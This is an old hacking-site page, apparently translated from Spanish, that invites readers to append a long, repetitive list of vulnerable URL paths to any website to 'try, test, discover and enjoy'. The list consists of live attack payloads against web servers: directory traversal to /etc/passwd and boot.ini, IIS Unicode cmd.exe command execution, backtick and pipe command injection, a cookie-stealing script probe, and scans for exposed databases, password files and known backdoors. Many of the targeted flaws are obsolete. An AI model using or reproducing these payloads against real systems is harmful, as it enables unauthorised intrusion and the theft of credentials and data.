Lasitudes (Vulnerabilities...)

 

First, let's clarify what vulnerabilities in a web page are. Well, a vulnerability (speaking in terms of a page) is something that makes the page vulnerable, if you'll pardon the redundancy. That is, it is something that leaves the page exposed to being modified in some respects, something that makes the page sensitive so that we can put our knowledge to use within it, so to speak.

 

Below is a detailed list of vulnerabilities. Some of them still work; others, on the other hand, stopped working with all these new technologies and changes, etc. But what matters here is that you try, test, discover and enjoy.

 

What you have to do to use these vulnerabilities is enter:

www.pagina.com/vulnerabilidad

 

/webMathematica/MSP?MSPStoreID=../../../../../etc/passwd&MSPStoreType=image/gif

/cgi-bin/cgiemail?required-webmaster=xxx@xxx.com&required-from=zzz@zzz.com&required-

/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/

/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories

/launch.jsp?NFuse_Application=alert(document.cookie);

/user.php?

/database/metacart.mdb

/metacart/database/metacart.mdb/home.php?arsc_language=elvishishness

/bigsam_guestbook.php?displayBegin=9999...9999

/phpBB2/includes/db.php?phpbb_root_path= 

/includes/db.php?phpbb_root_path= 

/phpBB/bb_memberlist.php?sortby=user_regdate 

/../boot.ini 

/../../boot.ini 

/`cat%20/etc/hosts`

/cgi-bin/test-cgi.bat?|dir+c:+..\htdocs\dir.txt

/csSearch.cgi?command=savesetup&setup=`cat%20/etc/hosts`

/cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/hosts` 

/scripts/root.exe?/c+dir 

/MSADC/root.exe?/c+dir 

/c/winnt/system32/cmd.exe?/c+dir

/d/winnt/system32/cmd.exe?/c+dir 

/scripts/..%255c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir

/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir

/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir

/scripts/..%252f../winnt/system32/cmd.exe?/c+dir 

/c/inetpub/scripts/root.exe?/c+dir 

/d/inetpub/scripts/root.exe?/c+dir 

/srchadm 

/iissamples 

/iissamples/Default

/iissamples/ExAir 

/iissamples/ISSamples 

/iisamples/Sdk 

/Scripts/samples 

/Scripts/tools 

/_private 

/_vti_bin 

/_vti_log 

/_vti_pvt 

/_vti_txt 

/cgi-bin/_vti_cnf 

/_vti_bin/_vti_adm

/_vti_bin/_vti_aut 

/scripts/IISADMPWD 

/admisapi/ 

/scripts/Fpadmcgi.exe 

/msadc/samples/adctest.asp 

/_vti_bin/_vti_aut/author.dll 

/_vti_adm/admin.dll

/scripts/proxy/w3proxy.dll 

/scripts/cpshost.dll

/scripts/convert.bas 

/Sites/Knowledge/ 

/Sites/Samples/ 

/SiteServer/Publishing/ 

/scripts/perl 

/scripts/iisadmin/default.htm

/scripts/../../cmd.exe 

/cgi-win/wincgi.bat 

/scripts/convert.bas 

/..../Windows/Admin.pwl 

/_vti_bin/shtml.dll/_vti_rpc 

/_vti_bin/_vti_aut/author.dll 

/_vti_bin/_vti_aut/dvwssr.dll

/Scripts/ 

/cgi-bin/ 

/srchadm 

/iisadmin 

/iissamples 

/iissamples/Default 

/iissamples/ExAir 

/iissamples/ISSamples 

/iisamples/Sdk 

/_private 

/cgi-bin/_vti_cnf

/_vti_bin/_vti_adm

/_vti_bin/_vti_aut 

/scripts/iisadmin 

/scripts/IISADMPWD 

/scripts/iisadmin/samples 

/scripts/iisadmin/tools 

/admisapi/ 

/scripts/Fpadmcgi.exe 

/msadc/samples/adctest.asp

/_vti_bin/_vti_aut/author.dll 

/scripts/proxy/w3proxy.dll 

/scripts/cpshost.dll 

/AdvWorks/equipment/catalog_type.asp 

/scripts/perl 

/cgi-bin/visitor.exe

/scripts/../../cmd.exe

/scripts/convert.bas 

/cgi-bin/lasso.cgi 

/cgi-bin/rwwwshell.pl 

/cgi-bin/unlg1.1 

/cgi-bin/unlg1.2 

/cgi-bin/phf 

/cgi-bin/phf.cgi 

/cgi-bin/test-cgi 

/cgi-bin/finger 

/cgi-bin/Count.cgi

/cgi-bin/jj 

/cgi-bin/day5datacopier.cgi 

/cgi-bin/day5datanotifier.cgi 

/cgi-bin/php.cgi 

/cgi-bin/php 

/cgi-bin/nph-test-cgi 

/cgi-bin/nph-publish 

/cgi-bin/handler 

/cgi-bin/webdist.cgi

/cgi-bin/wrap.cgi 

/cgi-bin/AnyForm2

/cgi-bin/webgais 

/cgi-bin/websendmail 

/cgi-bin/faxsurvey 

/cgi-bin/htmlscript 

/cgi-bin/pfdisplay.cgi 

/cgi-bin/wwwboard.pl 

/cgi-bin/www-sql

/cgi-bin/view-source 

/cgi-bin/campas 

/cgi-bin/aglimpse 

/cgi-bin/glimpse 

/cgi-bin/man.sh 

/cgi-bin/AT-admin.cgi 

/cgi-bin/AT-generate.cgi 

/cgi-bin/filemail.pl 

/cgi-bin/maillist.pl

/cgi-bin/info2www

/cgi-bin/files.pl 

/cgi-bin/bnbform.cgi 

/cgi-bin/survey.cgi 

/cgi-bin/textcounter.pl 

/cgi-bin/classifieds.cgi 

/cgi-bin/environ.cgi 

/cgi-bin/wrap

/cgi-bin/cgiwrap

/cgi-bin/edit.pl 

/cgi-bin/perl 

/cgi-bin/Xrun.cgi

/cgi-bin/webgais 

/cgi-bin/dumpenv.pl 

/test/test.cgi-bin 

/scripts/submit.cgi-bin 

/users/scripts/submit.cgi-bin

/cgi-bin/guestbook.cgi 

/cgi-bin/guestbook.pl 

/cgi-bin/cachemgr.cgi 

/cgi-bin/whois_raw.cgi 

/cgi-bin/responder.cgi 

/cgi-bin/perlshop.cgi 

/cgi-bin/webwho.pl 

/cgi-bin/search.cgi?letter= 

/cgi-bin/plusmail

/cgi-bin/htsearch 

/cgi-bin/loadpage.cgi 

/cgi-bin/rpm_query 

/cgi-bin/infosrch.cgi 

/cgi-bin/getdoc.cgi 

/cgi-bin/bizdb1-search.cgi 

/cgi-bin/htsearch?config=aaa

/piranha/secure/passwd.php3 

/ultraboard.pl 

/cgi-bin/ultraboard.cgi 

/scripts/dbman/db.cgi-bin 

/cgi-bin/formmail.cgi 

/cgi-bin/dnewsweb.cgi 

/cgi-bin/dmailweb.cgi

/cgi-bin/calender.pl 

/cgi-bin/calender_admin.pl 

/cgi-bin/allmanage.pl 

/cgi-bin/allmanageup.pl 

/cgi-bin/ssi 

/cgi-bin/redirect.cgi 

/cgi-bin/changepw.cgi 

/cgi-bin/counterfiglet/nc/f

/cgi-bin/mdma.bat 

/cgi-bin/search/tidfinder.cgi?2956734 

/cgi-bin/cvsweb/cvsweb.cgi 

/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00

/pccsmysqladm/incs/dbconnect.inc 

/cgi-bin/admin/admin 

/cgi-bin/netauth.cgi 

/cgi-bin/htgrep 

/cgi-bin/wais.pl 

/admin.php3?admin=anything 

/cgi-bin/amlite/amadmin.pl

/cgi-bin/subscribe.pl 

/cgi-bin/news/news.cgi 

/cgi-bin/awl/auctionweaver.pl 

/cgi-bin/mailto.cgi 

/cgi-bin/YaBB.pl 

/cgi-bin/mailform.pl

/Newuser?Image=../../database/rbsserv.mdb

/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml

/cgi-bin/webdata.cgi 

/cgi-bin/cached_feed.cgi

/cgi-bin/mailfile.cgi

/cgi-bin/global.cgi 

/cgi-bin/pagelog.cgi 

/cgi-bin/scripts/whois.cgi?action=load&whois=check 

/cgi-bin/Search.pl

/cgi-bin/gbook/gbook.cgi?_MAILTO=check;id 

/cgi-bin/bb-hist.sh

/cgi-bin/build.cgi 

/cgi-bin/cgiforum.pl 

/forum/common.php 

/phorum/common.php 

/index.php3?vhosts[test]= 

/cgi-bin/db2www/library/document.d2w/show

/submit.php?CONF=anything 

/phpgroupware/inc/phpgwapi/phpgw.inc.php 

/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES= 

/cgi-bin/ad.cgi 

/cgi-bin/simplestmail.cgi

/cgi-bin/everythingform.cgi 

/cgi-bin/simplestguest.cgi 

/cgi-bin/ezshopper3/loadpage.cgi 

/cgi-bin/ezshopper2/loadpage.cgi 

/subscribe.pl?test@test.com

/technote/main.cgi-bin/oops?board=FREE_BOARD&command=down_load&filename=/../main.cgi

/technote/print.cgi-bin

/cgi-bin/register.cgi

/cgi-bin/newsdesk.cgi?t=../pass.txt 

/cgi-bin/webdriver 

/cgi-bin/bbs_forum.cgi 

/cgi-bin/setpasswd.cgi 

/cgi-bin/scancfg.cgi 

/cgi-bin/CrazyWWWBoard.cgi

/cgi-bin/empower?DB=UkRteamHole 

/cgi-bin/pals-cgi 

/ROADS/cgi-bin/search.pl 

/way-board/way-board.cgi-bin 

/cgi-bin/replicator/webpage.cgi 

/cgi-bin/auktion.pl

/opendir.php?requesturl=/etc/passwd 

/cgi-bin/webspirs.cgi 

/cgi-bin/commerce.cgi?page=check 

/cgi-bin/store.cgi?StartID=../etc/hosts%00.html 

/cgi-bin/hsx.cgi

/cgi-bin/mailnews.cgi 

/cgi-bin/adcycle 

/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd

/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini

/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server

/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC

/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 

/user.php&op=saveuser 

/banners.php?op=Change 

/cgi-bin/post-query 

/cgi-bin/ikonboard/help.cgi

/cgi-bin/s.cgi?q=a&tmpl=check 

/cgi-bin/anacondaclip.pl?template=check 

/cgi-bin/webspirs.cgi 

/cgi-bin/ustorekeeper.pl

/cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject= &replyto=0 

/cgi-bin/processit.pl 

/cgi-bin/nph-maillist.pl 

/cgi-bin/dcboard.cgi

/cgi-bin/dcadmin.cgi 

/cgi-bin/dcforumlib.pl 

/cgi-bin/upload_file.pl 

/filemanager/filemanager_forms.php 

/cgi-bin/lasso.cgi 

/cgi-bin/rwwwshell.pl 

/cgi-bin/unlg1.1 

/cgi-bin/unlg1.2

/cgi-bin/phf 

/cgi-bin/phf.cgi 

/cgi-bin/test-cgi 

/cgi-bin/finger 

/cgi-bin/Count.cgi 

/cgi-bin/day5datacopier.cgi 

/cgi-bin/day5datanotifier.cgi 

/cgi-bin/php.cgi 

/cgi-bin/php

/cgi-bin/nph-test-cgi 

/cgi-bin/nph-publish 

/cgi-bin/handler 

/cgi-bin/webdist.cgi 

/cgi-bin/wrap.cgi 

/cgi-bin/AnyForm2 

/cgi-bin/webgais 

/cgi-bin/websendmail 

/cgi-bin/faxsurvey

/cgi-bin/htmlscript 

/cgi-bin/pfdisplay.cgi 

/cgi-bin/perl.exe 

/cgi-bin/wwwboard.pl 

/cgi-bin/www-sql 

/cgi-bin/view-source 

/cgi-bin/campas 

/cgi-bin/aglimpse 

/cgi-bin/man.sh

/cgi-bin/AT-admin.cgi 

/cgi-bin/AT-generate.cgi 

/cgi-bin/filemail.pl 

/cgi-bin/maillist.pl 

/cgi-bin/info2www 

/cgi-bin/files.pl 

/cgi-bin/bnbform.cgi 

/cgi-bin/survey.cgi

/cgi-bin/textcounter.pl 

/cgi-bin/classifieds.cgi 

/cgi-bin/environ.cgi 

/cgi-bin/wrap 

/cgi-bin/cgiwrap

/cgi-bin/edit.pl

/cgi-bin/perl 

/domcfg.nsf 

/today.nsf 

/names.nsf 

/catalog.nsf

/log.nsf 

/domlog.nsf 

/cgi-bin/Xrun.cgi 

/cgi-bin/webgais

/cgi-bin/dumpenv.pl 

/adminlogin?RCpage=/sysadmin/index.stm 

/test/test.cgi 

/scripts/submit.cgi

/users/scripts/submit.cgi 

/cgi-bin/guestbook.cgi 

/cgi-bin/guestbook.pl 

/cgi-bin/cachemgr.cgi 

/cgi-bin/whois_raw.cgi 

/cgi-bin/responder.cgi 

/cgi-bin/perlshop.cgi

/ncl_items.html?SUBJECT=2097

/cgi-bin/webwho.pl

/manage/cgi/cgiproc

/cgi-bin/query 

/cgi-bin/w3-msql 

/cgi-bin/search.cgi?letter= 

/cgi-bin/plusmail

/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi 

/cgi-bin/htsearch 

/cgi-bin/loadpage.cgi 

/cgi-bin/rpm_query 

/cgi-bin/infosrch.cgi 

/publisher 

/PSUser/PSCOErrPage.htm

/cgi-bin/getdoc.cgi 

/cgi-bin/bizdb1-search.cgi 

/cgi-bin/htsearch?config=aaa 

/piranha/secure/passwd.php3^Redhat 6.2 backdoor(passwd.php3);; 

/ultraboard.pl

/cgi-bin/ultraboard.cgi 

/scripts/dbman/db.cgi 

/cgi-bin/formmail.cgi 

/cgi-bin/dnewsweb.cgi

/cgi-bin/dmailweb.cgi 

/cgi-bin/calender.pl 

/cgi-bin/calender_admin.pl

/cgi-bin/allmanage.pl 

/cgi-bin/allmanageup.pl 

/cgi-bin/ssi 

/adpassword.txt 

/cgi-bin/redirect.cgi 

/cgi-bin/changepw.cgi 

/cgi-bin/counterfiglet/nc/f 

/cgi-bin/mdma.bat

/cgi-auth/userreg.cgi

8987/sawmill

/cgi-bin/search/tidfinder.cgi?2956734

/cgi-bin/view_page.html

/admin-serv/config/admpw 

/cgi-bin/cvsweb/cvsweb.cgi

/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00

/examples/applications/bboard/bboard_frames.html

/pservlet.html

/login.jsp

/ConsoleHelp/login.jsp

/pccsmysqladm/incs/dbconnect.inc 

/cgi-bin/admin/admin 

/cgi-bin/netauth.cgi 

/cgi-bin/htgrep 

/cgi-bin/wais.pl 

/admin.php3?admin=anything 

/cgi-bin/amlite/amadmin.pl

/cgi-bin/subscribe.pl 

/cgi-bin/news/news.cgi

/cgi-bin/awl/auctionweaver.pl 

/phpPhotoAlbum/explorer.php 

/cgi-bin/mailto.cgi 

/search97cgi/vtopic 

/cgi-bin/YaBB.pl

/cgi-bin/mailform.pl 

/Newuser?Image=../../database/rbsserv.mdb

/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml

/cgi-bin/webdata.cgi 

/cgi-bin/cached_feed.cgi

/cgi-bin/mailfile.cgi 

//WEB-INF/ 

/exec/show/config/cr 

/cgi-bin/global.cgi^*BSD Global Port (global.cgi) ;; 

/cgi-bin/pagelog.cgi^Pagelog (pagelog.cgi);;

/cgi-bin/scripts/whois.cgi?action=load&whois=check

2301/survey

/cgi-bin/gbook/gbook.cgi?_MAILTO=check;id

/cgi-bin/bb-hist.sh 

/cgi-bin/build.cgi 

/cgi-bin/cgiforum.pl

/forum/common.php 

/phorum/common.php 

/index.php3?vhosts[test]= 

/cgi-bin/db2www/library/document.d2w/show 

/includes/global.inc 

/submit.php?CONF=anything

/8765/index.html 

/8765/example/ 

/phpgroupware/inc/phpgwapi/phpgw.inc.php 

/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES= 

/cgi-bin/ad.cgi 

/cgi-bin/simplestmail.cgi

/cgi-bin/everythingform.cgi 

/cgi-bin/simplestguest.cgi

/cgi-bin/ezshopper3/loadpage.cgi 

/cgi-bin/ezshopper2/loadpage.cgi 

/subscribe.pl?test@test.com

/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi

/cgi-bin/register.cgi

/cgi-bin/newsdesk.cgi?t=../pass.txt

/cgi-bin/webdriver

/cgi-bin/bbs_forum.cgi 

/class/mysql.class 

/inc/sendmail.inc 

/setpasswd.cgi 

/scancfg.cgi 

/cgi-bin/empower?DB=UkRteamHole 

/cgi-bin/pals-cgi 

/ROADS/cgi-bin/search.pl

/way-board/way-board.cgi 

/cgi-bin/replicator/webpage.cgi 

/cgi-bin/auktion.pl 

/opendir.php?requesturl=/etc/passwd 

/cgi-bin/webspirs.cgi 

/cgi-bin/commerce.cgi?page=check

/cgi-bin/ipf/etc/gfw/ui/pwd.dat 

/cgi-bin/hsx.cgi 

/cgi-bin/mailnews.cgi 

/cgi-bin/adcycle 

/cgi-bin/post-query 

/cgi-bin/s.cgi?q=a&tmpl=check 

/cgi-bin/webspirs.cgi

/cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi& TopicSubject=&replyto=0 

/cgi-bin/processit.pl 

/cgi-bin/nph-maillist.pl 

/cgi-bin/cal_make.pl

 


| Hack Enterprise [ http://hacke.webcindario.com ] | All rights reserved ® | CopyRight 2002-2XXX © | Partial and/or total copying of the site is prohibited | Linking linked links is prohibited, linking links too... without the prior and/or advance authorization of the webmaster(s) | The entire design of the site, images, logos, etc. is reserved by copyright | Webmasters -> webmaster@hackenterprise.zzn.com | Page -> hacke@hackenterprise.zzn.com | Webmaster limp -> Mario E. Geréz of the Argentine Republic, Bs. As., La Matanza, Isidro Casanova | Thanks to the friendly sites for the material provided! |